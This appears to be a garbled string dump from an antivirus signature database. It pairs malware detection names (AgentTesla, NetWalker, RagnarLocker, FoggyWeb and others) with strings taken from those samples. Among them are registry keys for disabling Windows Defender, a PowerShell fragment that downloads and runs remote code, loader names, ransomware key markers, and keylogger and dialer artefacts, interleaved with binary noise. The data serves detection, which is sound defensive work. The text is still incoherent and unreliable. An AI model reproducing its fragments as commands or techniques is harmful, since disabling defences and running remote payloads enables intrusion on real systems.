DEFENDER\\ExclusionsJ(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Exclusions\\*(infinite)<(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\FeaturesH(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Features\\*(infinite)O(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Miscellaneous Configuration[(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Miscellaneous Configuration\\*(infinite)<(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\MpEngineH(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\MpEngine\\*(infinite)7(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\NISC(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\NIS\\*(infinite)>(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\QuarantineJ(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Quarantine\\*(infinite)H(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Real-Time ProtectionT(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Real-Time Protection\\*(infinite)?(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\RemediationK(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Remediation\\*(infinite)8(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\ScanD(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Scan\\*(infinite)E(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Signature UpdatesQ(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Signature Updates\\*(infinite):(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\SpynetF(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Spynet\\*(infinite);(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\ThreatsG(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Threats\\*(infinite)D(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\UX ConfigurationP(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\UX Configuration\\*(infinite)8(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\WCOSD(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\WCOS\\*(infinite)R(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Windows Defender Exploit Guard^(98304,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\Windows Defender Exploit Guard\\*(infinite)X(2047,4),HKLM\\SOFTWARE\\CLASSES\\AppID\\{2781761E-28E2-4109-99FE-B9D127C57AFE}\\*(infinite)X(2047,4),HKCU\\SOFTWARE\\CLASSES\\AppID\\{2781761E-28E2-4109-99FE-B9D127C57AFE}\\*(infinite)[(2047,4),HKLM\\SOFTWARE\\CLASSES\\AppID\\{2781761E-28E2-4109-99FE-B9D127C57AFE}\\*(infinite)\\\\*[(2047,4),HKCU\\SOFTWARE\\CLASSES\\AppID\\{2781761E-28E2-4109-99FE-B9D127C57AFE}\\*(infinite)\\\\*X(2047,4),HKLM\\SOFTWARE\\CLASSES\\CLSID\\{2781761E-28E2-4109-99FE-B9D127C57AFE}\\*(infinite)X(2047,4),HKCU\\SOFTWARE\\CLASSES\\CLSID\\{2781761E-28E2-4109-99FE-B9D127C57AFE}\\*(infinite)[(2047,4),HKLM\\SOFTWARE\\CLASSES\\CLSID\\{2781761E-28E2-4109-99FE-B9D127C57AFE}\\*(infinite)\\\\*[(2047,4),HKCU\\SOFTWARE\\CLASSES\\CLSID\\{2781761E-28E2-4109-99FE-B9D127C57AFE}\\*(infinite)\\\\*F(2047,4),HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\\\ProductAppDataPath>(2047,4),HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\\\\*G(2047,4),HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\\*(infinite)J(2047,4),HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\\*(infinite)\\\\*D(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\\\DisableAntivirusF(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\\\DisableAntiSpywareI(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\MICROSOFT ANTIMALWARE\\\\DisableAntivirusK(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\MICROSOFT ANTIMALWARE\\\\DisableAntiSpywareR(2047,4),HKLM\\SOFTWARE\\MICROSOFT\\MICROSOFT ANTIMALWARE\\FEATURES\\\\ForcePassiveModeC(2047,4),HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\\\EnableAuditMode[(2047,4),HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\MpEngine\\\\MpForceDelayReporting[(2047,4),HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\MpEngine\\\\MpContinueOnDetectionz 15b367fe3d15 syntpenh.exe HKCU\\software\\Wow6432Node\\microsoft\\windows nt\\currentversion\\terminal server\\install\\software\\microsoft\\windows\\currentversion\\runonce\\\\*MHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\*(infinite)THKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.htm\\UserChoice\\\\*UHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.html\\UserChoice\\\\*THKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.pdf\\UserChoice\\\\*THKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.doc\\UserChoice\\\\*UHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.docx\\UserCh api%-ms%-win%-system%-%w+%-l1%-1%-0%.dll )api%-ms%-win%-system%-%w+%-l1%-1%-0%.dll 25b3cbdfd0e2 34b36c2d36aa \\wsfadec.dll 6540148673fc rsasec.dll secctp.dll module_ls.dll deploy.dll deplay.dll jpicom.dll nbdcom.dll 2eb35f2f3cdf 2eb35f2f3cdfIncludesResearchData 19a78da5b1ec5 2d2911cd5db4 2d2911cd5db4IncludesResearchData !#PEPCODE:Virus:Win32/Virut.BN !#PEPCODE:Backdoor:WinNT/Rustock.F SectionAlignment !#ALF:Exploit:Script/UseMojoJsBindings.A!dha !#ALF:Exploit:Script/UseMojoJsBindings.A!dhaObMpAttributes test.html SCPT:CodeOnly.UseMojoJsBindings SCPT:CodeOnly.UseMojoJsBindings !#Lua:JSx2a !#Lua:JSx2aObMpAttributes [JSx2a] 477888a4efbf obf_oa_marker_%x%x bbb3378219e8 @EF@ f5b360fa5c1c 2f29b8bf316c 2f29b8bf316cIncludesResearchData //AGGR:OleFile (<a href%=\"http.-\">https%://businessonline%.o2%.co%.uk/) 9(<a href%=\"http.-\">https%://businessonline%.o2%.co%.uk/) <a href%=\"https%://businessonline%.o2%.co%.uk/.-\">https%://businessonline%.o2%.co%.uk/ W<a href%=\"https%://businessonline%.o2%.co%.uk/.-\">https%://businessonline%.o2%.co%.uk/ 101788a8cf2f6 moffset fileStrAddr stroffset current_byte 43b3fd68e1f5 55b3667e6849 55b3667e6849IncludesResearchData \\syncappvpublishingserver.exe T1490 inhibit_system_recovery !#Lua:PEEmbeddedAfterPng This program cannot be run in DOS mode 'This program cannot be run in DOS mode Lua:PEEmbeddedAfterPng !#Lua:JSxx2a !#Lua:JSxx2aObMpAttributes [JSxx2a] \t[JSxx2a] 25b39d421697 \\microsoftedge \\sophos\\ \t\\sophos\\ \\application\\browser.exe 55b3e2fb1e02 \tHEF@ 63b30f699c20 !#TEL:LuaZipBombHeur.A 65b312582b69 65b39fdb7bba 65b3c7d7caef 65b3cb1f034c )oVMv fRX} > 8EjSA jy\"a]>X u=\\*m \\f!A\t *;q:|/Z `qTxT ~[dth >zDrZ 3swg8 HIj8b ;.}NN ^ur'?k ]sD*k 4EM$, MiQr_g a_[pzm^& /_`xU KQ>9d #E-z\" Pc7IQ VAw[C kZL8f az~cx V+ARlw xa4Wh p-}I0]$ i*1#%l ikOPMU l77on :qO{2 MV=e{ +kB/6 `QoL! !Om%^ s`E?D I [&pO%8O A99 t :AK,- (v0m !Bw6]T|F 0npM!+ 5d~X z)# ,u ;gN = `1 `B iLF*P0-: 8\"Gz&=2 YqbA 2BU4X $R6wY '3Rt/ .Rr>jL iD|le }HD-\t bw?K- $TWwR 3Zd`[J 'nQ=z %GGw> ?>-KJ v+`X- F__\\} \tSBE,0/N @q+09 1P@]%~ 7tP%D ,A*wEG1 ?AVpc_mac_keyboard_file@@ ?AVpc_mac_terminal_manage@@ ?AVpc_mac_record_file@@ ?AVpc_mac_info@@ ?AVpc_mac_screen_file@@ ?AVpc_mac_download_file@@ ?AVpc_mac_online_info@@ ?AVpc_mac_feedback_log@@ ?AVpc_mac_feedback_log@@x !#HSTR:Win64/Dridex.MU!MTB \"securityPDpanther phitsEJason HWindows-only53jackassremainsblogitsX andYEarethorough $Minorfail)2uZasRcG 8KitsfromkisalsoEconomictheOS >decembersupport.29ChromiumA2015 :Ebeblogoreceivingad-blockinge ppmm365.pdb DecryptFileW GetSecurityDescriptorSaclx Form_change_password_FormClosed Warehouse_Management_System.Form_change_password.resources Warehouse_Management_System.Form_log_in.resources Warehouse_Management_System.Form_new_kind.resources Warehouse_Management_System.Form_new_material.resources Warehouse_Management_System.Form_new_worker.resources Warehouse_Management_System.Form_search.resources Warehouse_Management_System.Form_take_out.resources Warehouse_Management_System.Form_worker.resources Warehouse_Management_System.Main_Form.resources Warehouse_Management_System.Resources.resources CheckForSyncLockOnValueType ShutdownEventHandlerx !#ALFPER:Trojan:Win32/RofotRaw.A!dha fgrefgt=%s_%s_%s_%s_%s 2014-05-17 16:56:52 8180e320ee4090e41511836678e49a98c0b228e8 /rosemarie/mckenzie/ \\PrvicNativeRpcCliente.txt \\Secombe.txt \\PresentationKeyService.txt String is not valid length ... MEMORY_ALLOCATED\t \"%d\" Content-Type: multipart/form-data; boundary=---------------------------RXZpbF9CRDZOVHMSeV8k -----------------------------RXZpbF9CRDZOVHMSeV8k \\ManagmentServiceImplements \\GraphicsRemoteEngine InspectorOfficeGadget ClientEventLogMessages \\ReMe.txt hero= Con Error /c mkdir \"\" ModelsControllerLib %s-- luna= %Y%m%d-%I-%M-%S Galdot Galdotx !#ALF:HackTool:Win32/PSPegTool.B!dha !#ALF:HackTool:Win32/PSPegTool.B!dha AbusePreventionRulesConfig.xml TacticalDomains RedirectUrl TacticalLink InstallationLink Pegasus PS.agentsmith PS.TacticalSetup. PS.Exfiltration PS.BL.Aspects PS.CloudCommunication PS.Component.App PS.Configuration PS.Core.Impl PS.DataMigration PS.ExportData. PS.HttpSender PS.Installation.Python PS.LocationGrouping PS.LogicalStateFinalizer PS.Metrics.Prometheus PS.OpenPegasus. PS.ProtectionInitializer. PS.ServiceFacade PS.SourceData PS.StormSource. PS.Tactical PS.UI.Notification. PS.UI.WebApi. ST.SmsProvidersTester ST.Gsm.SmsLib ST.Core.Impl ST.Core.Implx LMS_DB_Project.Form1.resources Main_Library.Card.resources Library_Main.Detail.resources Main_Library.AdminMain.resources Main_Library.BorrowReturn.resources Library_Main.Member.resources Main_Library.Reader.resources Library_Main.Manager.resources LMS_DB_Project.AddBorrower.resources Main_Library.Properties.Resources.resources Main_Library.sdefsdfsdfsfs.resources LMS_DB_Project.Search_Books.resources LMS_DB_Project.Book_Loans.resources Main_Library.Insert.resources Library_Main.Library.resources &http://i.imgur.com/ !#SLFPER:Trojan:Win32/FatDuke.B!dha e0c0d8898ad68725161f428fc81bda249e34949d575 3c0e06206a079b91b222e8b10c9f9330618eb42e4f517973724ea483ca ogram Files\\Canon\\Network ScanGear\\Canocpc.dll 0be7dfa5 7dc931827 0ffbea9d84d353e5 3179aae ,\" \"%s %s%s%s%s%s%s \"\"%s%s%s\\ ,\" \"%s%s%s%s%s%s%s !#ALF:Ransom:Win64/NetWalker!MTB Wow64DisableWow64FsRedirection Wow64RevertWow64FsRedirection NtMapViewOfSection RtlCreateUserThread IEX (New-Object Net)Webclient))DownloadString( powershell -nop -exec bypass -EncodedCommand I'm already in SMB mode CreateFileMappingA PeekNamedPipe ImpersonateNamedPipeClient CreateProcessAsUserA CreateProcessWithLogonW CreateProcessWithTokenW RegOpenCurrentUse CryptGenRandom beacon ReflectiveLoader ReflectiveLoaderx Agent ,data/boyFirstNames.txt .data/girlFirstNames.txt $data/lastNames.txt ,MatrixEditor.Resources WebRequest ASDadADadAD (data/worldcities.csv Reset Matrices Vhttp://www.distance24.org/route.json?stops= $data/codenames.txt MatrixEditor.My.Resources MatrixEditor.Form1.resources MatrixEditor.Resources.resources MatrixEditor.AddMatrix.resources MatrixEditor.EditMatrix.resources MatrixEditor.EditMatrix.resourcesx !#App:CoinMiner32:EasyMiner [YES] if you wish to learn more and see how to disable virtual networkws adapters wich are incomaptible with Easyminer. w[YES] if you wish to learn more and see how to disable virtual networkws adapters wich are incomaptible with Easyminer. [EASY MINING] Easy Mining failed senddata because found blockshares where to small! Easyminer succesfully retrieved your newly generated coin adress @Easyminer succesfully retrieved your newly generated coin adress [EASY MINING] Easy Mining senddataonstart syn succes stream! <[EASY MINING] Easy Mining senddataonstart syn succes stream! could loose your Wallet! Backup your LTC Adress(+private key),email and easyminer folder somewhere safe gcould loose your Wallet! Backup your LTC Adress(+private key),email and easyminer folder somewhere safe A critical update is available for Easy Miner ! /A critical update is available for Easy Miner ! Nag Screen - Easy Miner running for : %Nag Screen - Easy Miner running for : Easy Mining was not able to determine whether your computer is using a Nvidia GeForce or AMD Radeon based video card. uEasy Mining was not able to determine whether your computer is using a Nvidia GeForce or AMD Radeon based video card.x !#HSTR:Trojan:MSIL/AgentTesla.SJ1!MTB GetDomain set_FileExtension RemoveFileExtension Joc_de_cartes.My.Resources Joc_de_cartes.Form1.resources Joc_de_cartes.dlg_Replace.resources Joc_de_cartes.dlg_TextString.resources Joc_de_cartes.frm_TextBlock.resources Joc_de_cartes.dlg_FindInfo.resources Joc_de_cartes.Form_stop.resources Joc_de_cartes.frm_WebBrowser.resources Joc_de_cartes.Resources.resources Joc_de_cartes.AudioBooks.resources Joc_de_cartes.PrintBooks.resources Joc_de_cartes.frm_PhotoOrbit.resources Joc_de_cartes.ShoppingCart.resources GpsImgDir FileCopy get_Directory CreateDirectoryx !#HSTR:Win32/Softcnapp.EXE!MTB '!#HSTR:Win32/Softcnapp.EXE!MTB Install.exe FSoftSvr.exe SoftUpdate.exe Fefficacy.exe MgUtility.exe MgUpd.exe MgConfig.exe MgMem.exe MgScreenMgr.exe MgWall.exe MgPlugin.exe SkyPic.exe Puenrecy.exe PicViewer.exe Trigidai.exe Secaler.exe Mraterng.exe WnPdfhshMin.exe WpTolhsj.exe SvWpHost.exe WpPow.exe WanPicService.exe WppdfSep.exe WanPicPower.exe MoWnpdfhsh.exe WnUserPage.exe WnSkinInst.exe WnMoniter.exe WnTool.exe WnConfig.exe WnWizard.exe WnUpd.exe WnUtility.exe Accurate64.exe Svccen.exe MainV.exe WnUninst.exe !#HSTR:FileTour.A1 /notificate.php \\*.lnk 4 \\Quick Launch\\User Pinned\\ Opera Chrome Safari Avant Amaya Arora Leechcraft Links Lunascape K-Meleon Konqueror Mosaic Maxthon Midori Mozilla Netscape RockMelt SeaMonkey YaBrowser Amigo &systemBrowser= &osBuild= getMacAddresses &productType= &osType= &systemUname= &systemLangid= !#HSTR:Win32/DownloadAdmin .build/shared_library.dll]] res/knockout.js]] Efficient Tomorrow Install4 InternalNamesetup.exe Modern New Installer4 Positive Tested Install System4 Meticulous Superior Install4 Supersonic Smooth Software Installer4 !#HSTR:Tracur_AntiEmu =+o#ou3) \thdLL \thdLLhame.hiefrT !#ALFPER:Trojan:MSIL/FoggyWeb.A!dha profile.webp ackground.webp ogo.webp GETE/adfs/por al/images/theme/li ht01/ \tPOSTU/adfs/s rvices/trust/2005 samlmixed/u pload GetAssemblyByName AssemblyNa GetAssemblyByNameAssemblyNa ExecuteAssemblyRoutin enameGetFrameExecuteAssemblyRoutin certificateType O<X509Cert ficate>(.*) /X509Certifi cate> K<Signatur Value>(.*)</SignatureV !#HSTR:VirTool:Win32/Obfuscator.ADB!EP !#TEL:Ransom:Win32/RagnarLocker.A -list -force -vmback -backup -share_network SeRestorePrivilege SeTakeOwnershipPrivilege \\\\.\\PHYSICALDRIVE%d ---END KEY R_R--- ---BEGIN KEY R_R--- ---RAGNAR SECRET--- Wow64EnableWow64FsRedirection Windows.old Tor browser Google Opera Software Mozilla Firefox $Recycle.Bin ProgramData All Users Sysvol .exex !#ALFPER:Trojan:Win32/Emaster.X!dha $Id: thread.c 14674 010-12-07 14:53:02Z gilg $ sanity check: invalid parameter in function call sanity check: licence error secure connection failed invalid credentials no data was received too long data for this type of transport invalid network buffer received socket error access violation not enough server resources to complete operation execution has been canceled timeout condition has been occured inside call of function function unsupported error has been suddenly occured $Id: t_status.c 14478 201 -11-27 12:41:22Z gilg $ %s: (0x%08x) %s: (%u) %s %s: (%d) !#HSTR:TrojanProxy:Win32/Ditsolay.A2 CD19BA67EE56F4568FDD69EB77A85EE5638ABD284F8BB2588FCB09499CAA2DD2043 026DEE13B21A389B35A7B61944F721A026CF07519633DA0057F361E10717B95F904 42AD2FD37DC465E678E272E27EB167EE688D41AF30AC5E86C10A4594EE27A051F72 B72C4BFC429B4B86D3060E4E 9FC323D47AD3035E8BD15AFA 5E993BEF6BE0074A87C06DD91636DE 8DF66999CF0E32A63FA5459E B7C0043E98EB18B72AA54F9DD765 86DA79AD26BC7390CE74 D279EC27AB2BDE7B9D38E861E11A0EB60635D9 A725AA56FD6D9E20B12E140F45EB26A9 E361E60A49984A8DC61B011AB0578D31 8FC519CB76D50B474187BB12B26DDD0B 64E1678AC919CA0C459D8790C66DA72B 963495BC1A49FA5CF56AD0CB0226DC60 4B89C06BE5107C9AFD 6EEC6496CE392B6BAE DD3853C8 120C0704 120C0704x !#HSTR:Trojan:MSIL/AgentTesla.SM!MTB GameFAQs_Reader.My.Resources GameFAQs_Reader.Form1.resources GameFAQs_Reader.HelpBox1.resources GameFAQs_Reader.AboutBox1.resources GameFAQs_Reader.FormAdvanced.resources GameFAQs_Reader.Display_Message.resources GameFAQs_Reader.Main_Screen.resources GameFAQs_Reader.QC_createQuoteFolder.resources GameFAQs_Reader.QC_createVendorFolder.resources GameFAQs_Reader.QC_createPOfolder.resources GameFAQs_Reader.FrmStudyNotifier.resources GameFAQs_Reader.frmRenamer.resources GameFAQs_Reader.QC_createCustomer.resources GameFAQs_Reader.QC_createVendor.resources GameFAQs_Reader.Resources.resources GameFAQs_Reader.QC_mainMenu.resources GameFAQs_Reader.QC_mainMenu.resourcesx !#ALF:HSTR:PageMonitoring.S001 \\system32\\reslan\\csrss.exe \\system32\\systsk\\age.exe AA6A1386E5B950C61558C9AA391E277FD9056FEFFDBEAD14BC260DD704E7C8D4 5C5FF67D2C6C8AE19061 A547EC5A650A8FFB3F49 5C9F47BA8C4C8E248715 pvah815a9g8l 8o0983o083on lhqw5wg34j2c 1ov00rba3i6f sn1b9xo4n839 557x64p15yu8 4ai474qv4t1f 9o3lmm89i3i4 175soc8523f5 8e54f7985gq6 oo89696pm9s4 50r4b1dy3go0 x2rj262b6695x !#ALFPER:Trojan:Win32/HyperStack.A!dha (M&M1M-M&M MpMqMmM'M/M/M M&M7M M6M/M&M M*M/M&M M\"M.M&M M,M3M:M \"M'M5M\"M3M M1M&M\"M7M&M M&M1M5M*M M&M M:M0M7M&M.M M,M,M7M REMOTE_NS: RROR:%d REMOTE:E RROR:%dREMOTE:E ROR:%d ERROR:%d ROR:%dERROR:%d UP:SUCCE FILE:ZERO S:%sFILE:ZERO LENGTH ACTION:UNSU PORTED PORTEDSystemRoo SilentMo nType\\\\% \\ipc$ ERROR: UP:SUCCESS dUP:SUCCESS ?Servic .exe?Servic CtrlHandler@@YGKKKPAX0@Z ?ServiceMain@@YAXKP CtrlHandler@@YGKKKPAX0@Z?ServiceMain@@YAXKP PA_W@Z !#TrojanSpy:Win32/Bancos.gen!K_7 n#u#R n#u@R n#u*R n#u%R n@u#R n@u@R n@u*R n@u%R n*u#R n*u@R n*u*R n*u%R 6c78d66536eb 6c78e0f0ea87 6c78f2c20c8f 6d7878b1969e 6d78971f3775 6d78ac405b02 6d78e6da2649 6d78fef8d7d3 6e6103761e05 6e7889bf5a53 6e78939b1691 6e78de9be4c3 6f615a57cc71 6f61f31b6a46 6f783c86f8ba 6f7859c16db9 6f78af442382 70785bbf511a 7078c7535ad5 71618e83bedb 7161f8efe2ac 71789e6ba8a8 7278196454ee 72786c1f4664 72789a9a989e 73780c09f1a4 73780cb9eac2 73783a5ad497 73786f2c2247 737875d5dd31 73789617d3db 7378d84aadb4 74781c504347 747843511917 7478fbbbd402 75400040b0ee 75617c42acba 75782ed5945d 7578483a0ae1 757864ee8cf1 7578c079629b 7578ea2e6430 76780537b996 767896145592 76789bc55488 7678bf97f611 7678e4e2f15f 7678f1120577 7761b5237a11 7778d5d69d99 7878055105e7 787828bad3b4 7878883a4aef 78789306b093 7878a8467461 7878ae27f0b7 7878db19be8e 796175970732 79784d2c0786 797863762afc 79786c32700a 797871bfdf23 797882c54db5 7a784f2021d6 7a78f734b372 7b78ab3beaf7 7b78cfbef4ee 7c61e3a332c0 7c78064b7146 7c784489dd95 7c787485693d 7c788e5c1cde 7c78adc919f9 7c78bcb75cf8 7c78d77cc703 : Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Bar888 Bar888.dll and click YES to continue uninstallation. Uninstallation aborted. SystemBiosDate_ \\svchosts.exe_ %\\svchosts.exe_ \\unsvchosts.exe` \\toolbar888`0 \\common files\\{304f0413-0a8c-2052-0814-030001}`0 \\common files\\{504f0413-0a8c-2052-0814-030001}c %\\unsvchosts.exe` &\\toolbar888`0&\\common files\\{304f0413-0a8c-2052-0814-030001}`0&\\common files\\{504f0413-0a8c-2052-0814-030001}c Software\\MyToolBar Software\\MyToolBarc- Software\\Classes\\MyToolBar.MyToolBarObj 'Software\\Classes\\MyToolBar.MyToolBarObjc/ Software\\Classes\\MyToolBar.MyToolBarObj.1 )Software\\Classes\\MyToolBar.MyToolBarObj.1cD Software\\microsoft\\windows\\currentversion\\uninstall\\ToolBar888 >Software\\microsoft\\windows\\currentversion\\uninstall\\ToolBar888cf SOFTWARE\\Microsoft\\Code Store Database\\Distribution Units\\{00000000-0000-0000-0000-100005000004} `SOFTWARE\\Microsoft\\Code Store Database\\Distribution Units\\{00000000-0000-0000-0000-100005000004}cr SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks\\\\{cfe9e8a8-38c0-4ef8-aec2-5035efe81030} lSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks\\\\{cfe9e8a8-38c0-4ef8-aec2-5035efe81030}q \\toolbar888\\activate.exeq &\\toolbar888\\activate.exeq \\toolbar888\\mytoolbar.dllq; \\common files\\{382d5d71-0957-1033-0729-050001}\\uninst.exeq; \\common files\\{782d5d71-0957-1033-0729-050001}\\update.exeq; \\common files\\{dcceb19b-0700-1033-0814-030001}\\update.exeq= \\common files\\{382d5d71-0957-1033-0729-050001}\\activate.exeq= \\common files\\{782d5d71-0957-1033-0729-050001}\\services.dllq> \\common files\\{382d5d71-0957-1033-0729-050001}\\mytoolbar.dll] &\\toolbar888\\mytoolbar.dllq;&\\common files\\{382d5d71-0957-1033-0729-050001}\\uninst.exeq;&\\common files\\{782d5d71-0957-1033-0729-050001}\\update.exeq;&\\common files\\{dcceb19b-0700-1033-0814-030001}\\update.exeq=&\\common files\\{382d5d71-0957-1033-0729-050001}\\activate.exeq=&\\common files\\{782d5d71-0957-1033-0729-050001}\\services.dllq>&\\common files\\{382d5d71-0957-1033-0729-050001}\\mytoolbar.dll] BrowserModifier:Win32/Forethought !BrowserModifier:Win32/Forethought Cgxp Software\\microsoft\\windows\\currentversion\\uninstall\\treewood <Software\\microsoft\\windows\\currentversion\\uninstall\\treewood] !Multi.TVSK @ !Berbew CRYPTKEY CRYPTEND ,\\device\\physicalmemory %FindNextFileA %FindNextFileAU %FindNextFileW %FindNextFileWU MonitoringTool:Win32/AllInOneKeylogger &MonitoringTool:Win32/AllInOneKeylogger =Gc9NR \\all in one.lnk_: \\microsoft\\internet explorer\\quick launch\\all in one.lnk` \\relytec` \\enihcamtaogcV &\\enihcamtaogcV Software\\microsoft\\windows\\currentversion\\uninstall\\All In One Keylogger 2.7_is1 PSoftware\\microsoft\\windows\\currentversion\\uninstall\\All In One Keylogger 2.7_is1q \\enihcamtaog\\csrss.exe] &\\enihcamtaog\\csrss.exe] !CarpeDiem ipwatchwinshoenolog SoftWare\\CarpeDiemVars\\Kit\\ dialup.carpediem. perl/countdialupinter.pl?name= perl/countdialupinter.pl?name=x RasDialEvent CDUpdater.exe C:\\Montorgueil\\ http://dialup.carpediem.fr/perl/dialup.pl http://dialup.carpediem.fr/perl/countdialupinter.pl? http://dialup.carpediem.fr/perl/countdialupinter.pl?x uiDialModemGetPingEvent dialup.pl http://adsl.carpediem.fr/perl/invoc_oneway.pl? CD_Dialer \\montorgueil` &\\montorgueil` \\programs\\hot dialerc Software\\Montorgueil Software\\Montorgueil] !VB.EW !VB.H \t9g`v# !VB.I !Small.AWV MonitoringTool:Win32/Softcows \\chatlogs.dll_ $\\chatlogs.dll_ \\activity keylogger.lnk` \\activity keylogger` \\activity keyloggerc! &\\activity keyloggerc! Software\\Activity Keylogger Software\\Activity Keylogger] !Lowzones.BZ !Lowzones.BZ\t@ !Zapchast !ZapchastU@ zo'q) [\"*~@ $|S0 r QA(Ng { QA(Ng g&-`Z 32evW SYSTEM\\CurrentControlSet\\Services\\Wlan1934 *SYSTEM\\CurrentControlSet\\Services\\Wlan1934] Software\\Classes\\SeAd.Ad Software\\Classes\\SeAd.Adc Software\\Classes\\SeAd.Ad.1 Software\\Classes\\SeAd.Ad.1] !Lager !Lowzones.A Program:Win32/Yazzle.B !VB.NH ,Explorer\\Shell Folders `tiwlbnapgjsp4qyzsylldu3ylv4rnvcr2wejder4py9rvmdc \\MsVersion.exe Tupdate regRun JxI\\p !Compidere Software\\AdwareDisableKey3 Software\\AdwareDisableKey3c Software\\AdwareDisableKey3] !Sinowal.D !Brunme.A ~HbC@ \\winbrume.datc %\\winbrume.datc Software\\DBZBHO Software\\DBZBHOc Software\\ZEROSOFT Software\\ZEROSOFT] D\\,!D Program:Win32/Yazzle.A gJdoJ !BK\t@ Software\\Classes\\Da.Bomb Software\\Classes\\Da.Bombc Software\\Classes\\Da.Bomb.1 Software\\Classes\\Da.Bomb.1c! Software\\Classes\\Crypt.Core Software\\Classes\\Crypt.Corec# Software\\Classes\\Crypt.Core.1 Software\\Classes\\Crypt.Core.1c# Software\\Classes\\ONONE.Theimp Software\\Classes\\ONONE.Theimpc% Software\\Classes\\ONONE.Theimp.1 Software\\Classes\\ONONE.Theimp.1] \"D\\:#D BrowserModifier:Win32/Searchingbooth $BrowserModifier:Win32/Searchingbooth Iog&@K #D\\8'D BrowserModifier:Win32/Hijacker.E BrowserModifier:Win32/Hijacker.E ID2D`\t \\pshopec ID2D`\t&\\pshopec Software\\PSHope Software\\PSHopeq \\pshope\\pshope.exeq &\\pshope\\pshope.exeq \\pshope\\uninstall.exe] &\\pshope\\uninstall.exe] !QUrl @ 2),gG 4D\\'7D !EICAR_Test_File Q5.c] @D\\(CD !Searchclickads Software\\microsoft\\windows\\currentversion\\uninstall\\OvMon 9Software\\microsoft\\windows\\currentversion\\uninstall\\OvMoncB SYSTEM\\CurrentControlSet\\Services\\Windows Overlay Components <SYSTEM\\CurrentControlSet\\Services\\Windows Overlay Componentsq \\pscastor\\pscastor.exe] &\\pscastor\\pscastor.exe] $8t O ED\\ GD 1FnDialer attern not found! Function not found! fnDialerDll attern not found!Function not found!InfofnDialerDll] !Dialui DialUI Would you like to reconnect to the internet? Time limit reached. You are now being disconnected We hope you've enjoyed the games! software\\microsoft\\windows\\currentversion\\wintrust\\trust providers\\software publishing\\trust database\\0 update.php [%d%s/min] reconn_url http://127.0.0.1:20202/remind.html AOL_Frame25 AOL_Frame25] !Axis.B iexplore.exe http:// @mmprs premium /file.exe /file.exe] JD\\\"KD !WebDialler ,0-^i playground.com BADxTICKETxSTATUS DialerIconEvent 64.159.91.193 Obtained fresh ticket: SOFTWARE\\WebDialler teenpussy.andlotsmore.com n6ddlaappmutex n6ddlaappmutexx %02d:%02d:%02d, %c%02d.%02d per min AOL Dial-On-Demand feature membersplayground.com/ SOFTWARE\\SimpleDeliveryVehicle SOFTWARE\\SimpleDeliveryVehiclex Bei Benutzung dieser Software wird Ihr Modem eine 0190 (Deutschland), BTV Industries SOFTWARE\\DiallerProgram\\%s che erhebt und es mit seiner Genehmigung geschieht, wenn er durch den che erhebt und es mit seiner 